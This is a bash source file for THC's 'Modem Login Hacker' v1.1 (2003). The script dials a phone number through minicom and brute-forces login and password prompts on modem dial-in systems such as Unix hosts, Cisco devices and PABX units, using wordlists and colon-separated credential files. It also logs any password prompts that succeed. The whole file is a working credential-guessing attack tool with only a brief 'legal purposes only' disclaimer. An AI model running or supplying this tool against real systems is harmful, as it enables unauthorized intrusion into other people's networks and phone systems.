#!/bin/bash
#
# Modem Login Hacker v1.1 (c) 2003 by van Hauser / THC <vh@thc.org>
#
# Tries to guess login/passwords to break into modem dialups.
# Use only allowed for legal purposes (e.g. authorized penetration tests)
#
# Please read the README for full information
#

# THE ONLY CONFIG OPTION:
# Your modem init string
THC_LH_INIT="AT Z M0"


#########
#
# Do not change anything below!
#
VER="v1.1"
function help() {
    echo "Modem Login Hacker $VER (c) 2003 by van Hauser / THC <vh@thc.org>

Syntax:
  $0 PHONENUMBER type1 COLONFILE
  $0 PHONENUMBER type2 LOGINFILE PASSWORDFILE
  $0 PHONENUMBER type3 PASSWORDFILE
  $0 PHONENUMBER your_own_script INPUTFILE [INPUTFILE]

Options:
  PHONENUMBER    number to call and try to break in
  LOGINFILE      input file with logins to try
  PASSWORDFILE   input file with passwords to try
  COLONFILE      input file with "LOGIN:PASSWORD" entries

Types:
  type1+type2    should work against any login/password type modem prompts
  type3          should work against any password type modem prompts

This script is really flexible, it works against Unix, Cisco, Shiva, ROLM
PABX, Modem dialin password protection, and many, many more.
Take a look in the README. Use allowed only for legal purposes!
You can always find the newest version at http://www.thc.org"
    exit 1
}

test -z "$3" -o -z "$1" -o "$1" = "-h" && help
test -e "$2.scr" || {
    echo "Error: Script $2.scr does not exist."
    exit 1
}
test -e "$3" || {
    echo "Error: Inputfile $3 does not exist."
    exit 1
}
test -z "$4" -o -e "$4" || {
    echo "Error: Inputfile $4 does not exist."
    exit 1
}
test "$2" = "type1" -a -n "$4" && {
    echo "Error: type1 script only takes a colon file as input"
    exit 1
}
test "$2" = "type3" -a -n "$4" && {
    echo "Error: type3 script only takes a password file as input"
    exit 1
}
test "$2" = "type1" -o "$2" = "type3" || {
    test -z "$4" && {
	echo "Error: type2 script needs LOGIN and PASSWORD input files"
	exit 1
    }
}

MINICOM=""
minicom -h 2> /dev/null | grep -qw minicom && MINICOM=minicom
test -z "$MINICOM" || {
    MINICOM=`which minicom 2> /dev/null`
    test -x "$MINICOM" || for i in ./minicom /usr/bin/minicom /usr/local/bin/minicom \
      /bin/minicom /opt/bin/minicom /opt/minicom/minicom /opt/minicom/bin/minicom; do
            test -x "$MINICOM" || MINICOM="$i"
    done
    test -x "$MINICOM" || {
        echo "Error: Could not find minicom in your path."
        exit 1
    }
}

test -z "$THC_LH_INIT" && THC_LH_INIT="ATZ"
export THC_LH_INIT
export THC_LH_PHONE="$1"
CAPTUREFILE="${THC_LH_PHONE}_`date +%H%M%S-%d-%m-%y`.cap"

DONE=".${2}.done"
LOCK="/var/lock/LCK..modem"

trap "/bin/rm -f $DONE ${DONE}2 $LOCK; exit 0" 1 2 3 13 15

LOGIN_COUNT=0
PASSWORD_COUNT=0
LOGIN_MAX_COUNT=0
PASSWORD_MAX_COUNT=0
COUNT=0

declare -a LOGIN
declare -a PASSWORD

read -d '\0' -a LOGIN < $3
while [ ! -z "${LOGIN[$LOGIN_MAX_COUNT]}" ]; do
    LOGIN_MAX_COUNT=$(($LOGIN_MAX_COUNT + 1))
done
test -z "$4" || {
    read -d '\0' -a PASSWORD < $4
    while [ ! -z "${PASSWORD[$PASSWORD_MAX_COUNT]}" ]; do
        PASSWORD_MAX_COUNT=$(($PASSWORD_MAX_COUNT + 1))
    done
}

echo "You are running THC's Modem Login Hacker (Minicom Scripter) $VER"
echo "(c) 2003 by van Hauser / THC - Use only allowed for legal purposes."
echo
echo "Phonenumber: $THC_LH_PHONE"
echo "Script Type: $2"
echo "Login tries: $LOGIN_MAX_COUNT"
test "$PASSWORD_MAX_COUNT" = "0" || echo "Password tries: $PASSWORD_MAX_COUNT"
echo "Capturefile: $CAPTUREFILE"
echo Starting in 3 seconds ...
sleep 3

while [ "$LOGIN_COUNT" -lt "$LOGIN_MAX_COUNT" ] ; do
    test "$2" = "type1" || {
        export THC_LH_LOGIN1=${LOGIN[$LOGIN_COUNT]}
        export THC_LH_LOGIN2=${LOGIN[$(($LOGIN_COUNT + 1))]}
        export THC_LH_LOGIN3=${LOGIN[$(($LOGIN_COUNT + 2))]}
        export THC_LH_LOGIN4=${LOGIN[$(($LOGIN_COUNT + 3))]}
        export THC_LH_LOGIN5=${LOGIN[$(($LOGIN_COUNT + 4))]}
        test "$2" = "type3" || {
            export THC_LH_PASSWORD1=${PASSWORD[$PASSWORD_COUNT]}
            export THC_LH_PASSWORD2=${PASSWORD[$(($PASSWORD_COUNT + 1))]}
            export THC_LH_PASSWORD3=${PASSWORD[$(($PASSWORD_COUNT + 2))]}
            export THC_LH_PASSWORD4=${PASSWORD[$(($PASSWORD_COUNT + 3))]}
            export THC_LH_PASSWORD5=${PASSWORD[$(($PASSWORD_COUNT + 4))]}
        }
        test "$2" = "type3" && {
            export THC_LH_PASSWORD1=${LOGIN[$LOGIN_COUNT]}
            export THC_LH_PASSWORD2=${LOGIN[$(($LOGIN_COUNT + 1))]}
            export THC_LH_PASSWORD3=${LOGIN[$(($LOGIN_COUNT + 2))]}
            export THC_LH_PASSWORD4=${LOGIN[$(($LOGIN_COUNT + 3))]}
            export THC_LH_PASSWORD5=${LOGIN[$(($LOGIN_COUNT + 4))]}
	}
    }
    test "$2" = "type1" && {
        export THC_LH_LOGIN1=${LOGIN[$LOGIN_COUNT]/:*/}
        export THC_LH_LOGIN2=${LOGIN[$(($LOGIN_COUNT + 1))]/:*/}
        export THC_LH_LOGIN3=${LOGIN[$(($LOGIN_COUNT + 2))]/:*/}
        export THC_LH_LOGIN4=${LOGIN[$(($LOGIN_COUNT + 3))]/:*/}
        export THC_LH_LOGIN5=${LOGIN[$(($LOGIN_COUNT + 4))]/:*/}
        export THC_LH_PASSWORD1=${LOGIN[$LOGIN_COUNT]/*:/}
        export THC_LH_PASSWORD2=${LOGIN[$(($LOGIN_COUNT + 1))]/*:/}
        export THC_LH_PASSWORD3=${LOGIN[$(($LOGIN_COUNT + 2))]/*:/}
        export THC_LH_PASSWORD4=${LOGIN[$(($LOGIN_COUNT + 3))]/*:/}
        export THC_LH_PASSWORD5=${LOGIN[$(($LOGIN_COUNT + 4))]/*:/}
    }

    /bin/rm -f $DONE ${DONE}2 $LOCK
    {
        minicom -S $2.scr -o -C $CAPTUREFILE -8 2> /dev/null
    } 2> /dev/null
    /bin/rm -f $LOCK
    FINNISHED=`cat $DONE`
    grep -q NOTE: $DONE 2> /dev/null && {
	stty echo
	stty opost
	stty icrnl
	stty icanon
	clear
        echo
	echo -e "ERROR --- \007"
	cat $DONE
        echo
        echo "Finnished tries: $LOGIN_COUNT"
        echo "Next entry from file $3 would have been: \"${LOGIN[$LOGIN_COUNT]}\""
        test "$PASSWORD_MAX_COUNT" = "0" || echo "Next entry from file $4 would have been: \"${PASSWORD[$PASSWORD_COUNT]}\""
	exit 1
    }
    LOGIN_COUNT=$(($LOGIN_COUNT + $FINNISHED))
    test "$2" = "type1" -o "$2" = "type3" || {
	test "$FINNISHED" = "0" || PASSWORD_COUNT=0
        test "$FINNISHED" = "0" -a -e "${DONE}2" && {
	    FINNISHED=`cat ${DONE}2`
	    PASSWORD_COUNT=$(($PASSWORD_COUNT + $FINNISHED))
	    test "$PASSWORD_COUNT" -ge "$PASSWORD_MAX_COUNT" && {
	        PASSWORD_COUNT=0
	        LOGIN_COUNT=$(($LOGIN_COUNT + 1))
	    }
        }
    }
done

stty echo
stty opost
stty icrnl
stty icanon
clear
echo
echo "Finnished!"
echo
echo "Important entries in $CAPTUREFILE:"
grep "^NOTE: .* password:" $CAPTUREFILE 2> /dev/null
echo

/bin/rm -f $DONE ${DONE}2 $LOCK
exit 0
